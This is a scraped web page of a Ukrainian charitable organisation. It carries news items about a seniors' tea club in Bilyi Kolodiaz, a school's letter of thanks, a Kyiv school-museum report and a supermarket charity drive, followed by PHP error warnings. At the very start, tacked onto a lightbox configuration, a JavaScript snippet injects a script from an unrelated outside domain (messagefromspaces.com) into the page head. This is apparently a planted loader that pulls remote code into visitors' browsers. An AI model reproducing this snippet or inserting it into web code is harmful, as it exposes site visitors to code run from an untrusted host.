, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

О нас пишут

Телефонний дзвінок з Харківщини — бадьора нотка й приємне спілкування. Це — лише радісні емоції, оптимістичний настрій і творчий запал. Телефонувала завідуюча й художній керівник Білоколодязького селищного Будинку культури Алевтина Василівна Омельяненко.

— У мене зібралося так багато інформації! Насамперед хочу сказати, що нам неймовірно пощастило на прекрасну землячку — Світлану Винограденко, голову правління Міжнародної громадської організації «МОЗІРОН» («Міжнародна організація за збереження і розвиток народу»). Особливо активна робота розпочалася восени минулого року. Якось, одного приїзду, Світлана звернула увагу на те, що жінкам поважного віку, які вже на заслуженому відпочинку й не працюють, самотньо й незатишно залишатися наодинці…

Ось тоді Світлана Винограденко й запропонувала міні-проект «Весела гостинна хата Білоколодязької громади». За кілька днів ми отримали в подарунок для земляків чашки для чаю, чайник, скатертини, серветки, чай, цукерки. Тільки так, за чашкою чаю при дружній бесіді можна об’єднати людей.

На першу зустріч «Веселої гостинної хати» прийшло 25 чоловік. Жінки заповнили анкету: вказали свої улюблені заняття. А вже через кілька днів у клубі завирувало життя.

Понеділок, хоч і вихідний, і, як кажуть, нелегкий день, у Білому Колодязі з цим категорично не згодні. Щопонеділка в Будинку культури збираються ті, хто любить грати у шахи, шахмати, доміно, лото, нарди. Алевтина Василівна уточнює, що набори ігр благочинно передала та ж Світлана Винограденко та її подруги Тетяна Дурнєва, Оксана Сохатська.

Щовівторка у «Хаті» курси англійської мови. Заняття проводить Алевтина Омельяненко (раніше вона викладала англійську мову в школі). (далее…)

Добрий день, любі жінки похилого віку всього світу!

Вступаючи в новий рік, нехай відкриються Ваші серця для нових знайомств, світлих почуттів та щасливих посмішок! Нові бажання та нові ідеї нехай збагатять Ваше життя та нададуть наснаги в роботі, в сім’ї. Щиро бажаємо Вам міцного здоров’я та перемоги у всіх Ваших починаннях. Нехай Бог благословить Вас і Ваші родини.

Бажаємо, щоб у Ваших оселях країни панували мир та злагода. З найкращими побажаннями звертаються до Вас жінки похилого віку (від 55 до 77 років) селища Білий Колодязь.

Селище міського типу Білий Колодязь розташоване на сході України у Вовчанському районі Харківської області та має населення, приблизно, 3500 людей, з яких більша частина – люди похилого віку. (далее…)

 

 

 

 

 

 

Голові Правління МГО «МОЗІРОН»

Винограденко Світлані Володимирівні

 

ЛИСТ-ПОДЯКА 

Шановна Світлано Володимирівно!

Висловлюю Вам щиру подяку за активну громадську позицію, вагомий внесок у духовний, спортивний розвиток учнівської молоді та дітей Білоколодязького НВК. Велике спасибі Вам за чудові подарунки: шведські стінки, гімнастичні мати, м’ячі та інший спортивний інвентар. За допомогою нього ми проводимо різні спортивні змагання у дошкільному підрозділі, на уроках фізичної культури та в позакласний час. Адже такого роду змагання – це безліч позитивних емоцій, нові цікаві знайомства, нові досягнення та здобуття цінного досвіду.

Спасибі Вам за чуйність, увагу,теплоту та любов. Надаючи допомогу, Ви даруєте радість і надію тому, хто цього потребує.

Бажаємо Вам і Вашому колективу всього самого найкращого, міцного здоров’я, процвітання, душевного тепла та любові на життєвому шляху, успіхів у професійній діяльності. Сподіваємося, що і надалі наша співпраця буде плідною.

Низький уклін Вам за Вашу турботу, працьовитість, терпіння, готовність надати всіляку підтримку.

 

Директор Білоколодязького НВК              С.В. Ткаченко

 

 


Спеціально для «Час і Події» Нью-Йорк 22.01.15 вийшов репортаж Лідіі Корсун “Київські етюди-2015: Шкільна родина київської спеціалізованої школи № 113″ номер #2015-04

Унікальна жінка – Світлана Винограденко, привела Лідію в цю школу 15 січня, заінтригувавши: «Хочете познайомитися з музеєм однієї української сільської родини Коломицьких, що в школі № 113?»
«Хотіла б. Але це ж така далечінь – Червоний хутір, околиця Києва?» – нерішуче відповіла Лідія Світлані. – «Як ви можете таке казати? Яка околиця? Це ж Дарницький район столиці. Ще з Княжих часів, коли каравани підходили до Києва, то на цьому кордоні падали ниць і вручали дари за право ввійти у місто. Звідсіля – «Дарниця» (місце дарунків)… Тут ще тоді починався Київ… Та й доїхати легко – станція метро «Бориспільська». Вмовила. (далее…)

В сети "Велика Кишеня" успешно завершилась благотворительная акция

13.11.2013
В сети супермаркетов «Велика Кишеня» завершилась благотворительная акция «Помощь многодетным семьям» в рамках проекта Международной Общественной Организации «МОЗИРОН» «За сохранение и развитие народа».
Цель акции – сбор продуктов питания, промышленных товаров и денежных средств для малообеспеченных и многодетных семей. Покупателям было предложено сделать дополнительную покупку и пожертвовать её на благотворительность.Покупатели сети «Велика Кишеня» оказались очень отзывчивыми и неравнодушными людьми. Они не просто делали очень щедрые покупки для семей, а и решили взять шефство над некоторыми из них. Теперь у нескольких семей есть постоянные благодетели, а покупатели-меценаты нашли целевое применение своим душевным порывам в оказании помощи. Многодетные папы и мамы подходили за подарками непосредственно в магазин. Они были очень растроганы и благодарны за оказанное им внимание. (далее…)
 • Страница 1 из 2
 • 1
 • 2
 • >

TRANSLATE

Russian to English Russian to German Russian to French Russian to Spanish Russian to Italian Russian to Japanese Russian to Chinese

Новости и События

Отзывы

 • Детская спортиная школа "Колос"

  Шановна Світлана Володимірівна! [img]http://moziron.org/wp-content/uploads/2016/12/viber-image_1.jpg[/img]
  Читать полностью...
  Оставлен 23 Дек 2016
 • Білоколодязький НВК

  Шановна Світлано Володимирівно! Вісловлюю вам щиру подяку за активну громадську позицію , вагомий внесок...
  Читать полностью...
  Оставлен 15 Дек 2016

ФОТОГАЛЕРЕЯ


Warning: array_merge() [function.array-merge]: Argument #1 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Видео

 

Наши партнеры

Бориспільський дошкільний навчальний заклад (ясла-садок) комбінованого типу №2